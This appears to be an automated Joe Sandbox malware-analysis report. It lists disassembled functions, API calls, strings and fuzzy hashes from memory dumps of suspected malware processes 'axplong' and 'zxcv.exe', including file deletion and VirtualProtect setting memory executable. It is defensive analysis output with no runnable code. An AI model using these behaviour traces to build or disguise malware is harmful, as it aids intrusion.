Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: @y'
API String ID: 4078500453-3559662342
Opcode ID: ac1e791b4c59f83947b5a6c93fa7eadeb8a5fbc3a2889d20e6c904322144c52a
Instruction ID: 374eac08bd8a581c3066eb34f711cb83e8f1a9ae076c0070070ac064eb93b578
Opcode Fuzzy Hash: ac1e791b4c59f83947b5a6c93fa7eadeb8a5fbc3a2889d20e6c904322144c52a
Instruction Fuzzy Hash: B531E5B29247059FD720DF64D845B66B7E8EF14310F104A3EE64DC7241E771EA64CBA1

Function 00262AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00262B23

Strings

P#&, xrefs: 00262B18
P#&, xrefs: 00262B2E
This function cannot be called on a default constructed task, xrefs: 00262B03

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#&$P#&$This function cannot be called on a default constructed task
API String ID: 2659868963-4226515001
Opcode ID: 82820b28078d9be0a6984bb1b07bf0f255e8d0d35fae8f633da947e93d79b3e7
Instruction ID: 7183134d4df9fa38b8b390aa467b7a8365ffdd37c20b568516c04d6af21b1295
Opcode Fuzzy Hash: 82820b28078d9be0a6984bb1b07bf0f255e8d0d35fae8f633da947e93d79b3e7
Instruction Fuzzy Hash: 0CF0967092030C9BC714DFA8AC419DEF7EDDF15300F5081AEF94997641EFB0AA688B95

Function 0029C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0029CA37

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: a99f6273e595e8a2d2eeedc1244b9bea30296365cbe8a9b577231b9bc6af6f84
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: 19B136329202869FDF15CF28C891BBEBFE5EF55344F3481AAE849AB341D6349D51CB60

Function 0027BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0027BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0027BB14
_xtime_get.LIBCPMT ref: 0027BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0027BB43

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 57f723546a1fe8efed36185f8cc5dfd58e71d9d077d365e8aeeecb575e10b49b
Instruction ID: 99c07325067f639e2d85b2fe38ab2f37cbfb93a808403b5cd8569c214c12146c
Opcode Fuzzy Hash: 57f723546a1fe8efed36185f8cc5dfd58e71d9d077d365e8aeeecb575e10b49b
Instruction Fuzzy Hash: 68217F71A10119AFDF11EFA4DC869AEBBB8EF08314F108029F905B7250DB30AD118FA1

Function 00277040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 0027726C

Strings

@.&, xrefs: 00277250
`z', xrefs: 00277282

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @.&$`z'
API String ID: 3366076730-3172844475
Opcode ID: ca7b6c27b332bebc07e058ce5655873481cd81908fd67ea3d611b06d77b99d50
Instruction ID: e0ba0cb872b41eba591061df9bbbee4ebd9bcf0da90bb4ebb0d8fce8c76dd37b
Opcode Fuzzy Hash: ca7b6c27b332bebc07e058ce5655873481cd81908fd67ea3d611b06d77b99d50
Instruction Fuzzy Hash: 6DA137B0E116158FDB21CFA8C884B9EBBF1AF48710F18819AE819AB351E7759D11CF80

Function 00278E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197COMMON

Download Yara Rule

Strings

P#&, xrefs: 0026246D
P#&, xrefs: 00262486

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: P#&$P#&
API String ID: 0-1581809584
Opcode ID: 93babc140eca058cdc3bb06ce053c41c57b69409b6e9d6f414ec66fb2b481e83
Instruction ID: 3661fd899de8816997527b7fbcc37772830816f5d8fc97541ea2aa97dbf4b58f
Opcode Fuzzy Hash: 93babc140eca058cdc3bb06ce053c41c57b69409b6e9d6f414ec66fb2b481e83
Instruction Fuzzy Hash: 52512B729201099BCF14DF68DC45A6EB7E9EF44310B504669F909DB341EB70EE708BD2

Function 0029F21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0029F263

Strings

8",, xrefs: 0029F30B
`',, xrefs: 0029F235

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8",$`',
API String ID: 3903695350-3341778876
Opcode ID: 76f166f1eaa35443505cee4bed70d8def8ca3c1b1865fd5d39444871d95550a0
Instruction ID: 2692389c101986a0ecfaf3bff45572626a92258ea9e269ba4c81f7b8378d2b19
Opcode Fuzzy Hash: 76f166f1eaa35443505cee4bed70d8def8ca3c1b1865fd5d39444871d95550a0
Instruction Fuzzy Hash: C2316D31A203069FEFA1AF78DA45B5A73E9AF00310F10446AE84ADB191DF35FCA0CB55

Function 00263930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00263962
__Mtx_init_in_situ.LIBCPMT ref: 002639A1

Strings

pB&, xrefs: 00263940

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pB&
API String ID: 3366076730-3153205560
Opcode ID: 3599a7a26da6eaed7168d5ac0cff5651744fadcfe72d8b2a218e11714abd3b1d
Instruction ID: 2abf91325e9006c3857af770035fcf62a17bb311f89428bb5fe3f1e73287191a
Opcode Fuzzy Hash: 3599a7a26da6eaed7168d5ac0cff5651744fadcfe72d8b2a218e11714abd3b1d
Instruction Fuzzy Hash: 974124B0501B068FD720CF68C588B5ABBF0FF44315F20861DE86A8B341E7B5AA65CF80

Function 00262440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0026247E

Strings

P#&, xrefs: 0026246D
P#&, xrefs: 00262486

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#&$P#&
API String ID: 2659868963-1581809584
Opcode ID: 9e15a440c2581a008a51bd1d798555d2d7715963688ccbc348e184063255667c
Instruction ID: 6c0736298f26b38d081345ec0fce9727c9f3f1efaafad36f4853eeb97e01ed1a
Opcode Fuzzy Hash: 9e15a440c2581a008a51bd1d798555d2d7715963688ccbc348e184063255667c
Instruction Fuzzy Hash: 4BF0E5B5D2020C67CB14EFE4D841DCAB3ACDE15340B008A25F754E7600F770FA648B91

Function 00262520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00262552

Strings

P#&, xrefs: 00262547
P#&, xrefs: 0026255D

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#&$P#&
API String ID: 2659868963-1581809584
Opcode ID: 6ce5a9f831d6d87b2bd1e1ac8a5a4f83bb247bda645676cbe2e4d4e5b75082da
Instruction ID: ca4d0ff054385051adc946c64b99152da92c4b36baf14466e95a084b2b35333c
Opcode Fuzzy Hash: 6ce5a9f831d6d87b2bd1e1ac8a5a4f83bb247bda645676cbe2e4d4e5b75082da
Instruction Fuzzy Hash: 7DF08271D2020D9BCB15DFA8D8419CEBBF8AF55300F1082AEE44567200EA706A648F99

Analysis Process: zxcv.exePID: 6128, Parent PID: 3924COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.9%
Total number of Nodes:	608
Total number of Limit Nodes:	9

Executed Functions

Function 002457B4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 141
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(static.lib), ref: 002458DB
VirtualProtect.KERNELBASE(0034BE40,000004E4,00000040,?), ref: 002458EE
GetProcessHeap.KERNEL32(00000008,00000400), ref: 00245906
HeapAlloc.KERNEL32(00000000), ref: 00245909
wsprintfA.USER32 ref: 0024591B
GetStdHandle.KERNEL32(000000F5,00000000,00000000,00000000,00000000), ref: 0024592B
WriteConsoleA.KERNEL32(00000000), ref: 00245932
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0024593A
HeapFree.KERNEL32(00000000), ref: 0024593D

Part of subcall function 002421D2: _strlen.LIBCMT ref: 002421EA

Strings

Window1, xrefs: 002457E3
static.lib, xrefs: 002458A1, 002458AE, 002458DA

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: Heap$Process$AllocConsoleDeleteFileFreeHandleProtectVirtualWrite_strlenwsprintf
String ID: Window1$static.lib
API String ID: 523815168-642987920
Opcode ID: 590856cc893ced9d0c27bace204aaae9f68fba9c66293b6034758785a2891b57
Instruction ID: e6d78952db1a0438e78ffc91c7d90ef790ca9f454f6ce537642cb1fdf2c78f12
Opcode Fuzzy Hash: 590856cc893ced9d0c27bace204aaae9f68fba9c66293b6034758785a2891b57
Instruction Fuzzy Hash: E7416A72624311ABE229FF60EC46F6F7798EF45B14F014518FA85672C2DF70AC648AB1

Function 00260E89 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00260B42: CreateFileW.KERNELBASE(?,00000000,?,00260F32,?,?,00000000,?,00260F32,?,0000000C), ref: 00260B5F

GetLastError.KERNEL32 ref: 00260F9D
__dosmaperr.LIBCMT ref: 00260FA4
GetFileType.KERNELBASE(00000000), ref: 00260FB0
GetLastError.KERNEL32 ref: 00260FBA
__dosmaperr.LIBCMT ref: 00260FC3
CloseHandle.KERNEL32(00000000), ref: 00260FE3
CloseHandle.KERNEL32(0025A195), ref: 00261130
GetLastError.KERNEL32 ref: 00261162
__dosmaperr.LIBCMT ref: 00261169

Strings

H, xrefs: 002610EE

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: d2270c9b456f1805f961a42834ab5ac02196dca3b5e9b9e9476256713481a800
Instruction ID: be8bde165358f19c23994e81e204dc10ba4c4e0f155cb3b80cb99c8ee8d7f9cd
Opcode Fuzzy Hash: d2270c9b456f1805f961a42834ab5ac02196dca3b5e9b9e9476256713481a800
Instruction Fuzzy Hash: CAA15632A241559FCF19AF68DC82BAE7BA1AB47310F180159F8019F2D1CB71ACB2DB51

Function 002568F7 Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0025600A: GetConsoleOutputCP.KERNEL32(914AA853,00000000,00000000,00000000), ref: 0025606D

WriteFile.KERNEL32(?,00000000,?,0026D830,00000000,0000000C,00000000,00000000,00000000,00000000,0026D830,00000010,0024C7F0,00000000,00000000,00000000), ref: 00256A60
GetLastError.KERNEL32 ref: 00256A6A

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 996a8afa7bcd209aaa95ec04e3eb2474afe4519a9704c00c6491e6677f315140
Instruction ID: 5b80208ce8f4b9fa395d1cc9e9c04894eaa46a585047e1dcfcb66ff8b823180d
Opcode Fuzzy Hash: 996a8afa7bcd209aaa95ec04e3eb2474afe4519a9704c00c6491e6677f315140
Instruction Fuzzy Hash: 9F61D371D2015AAEDF11CFA8C848AEEBFB9AF19315F448084EC00BB252D371D969CB65

Function 002564C2 Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,00256A46,00000000,00000000,00000000,?,0000000C,00000000), ref: 0025655E
GetLastError.KERNEL32(?,00256A46,00000000,00000000,00000000,?,0000000C,00000000,00000000,00000000,00000000,0026D830,00000010,0024C7F0,00000000,00000000), ref: 00256584

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

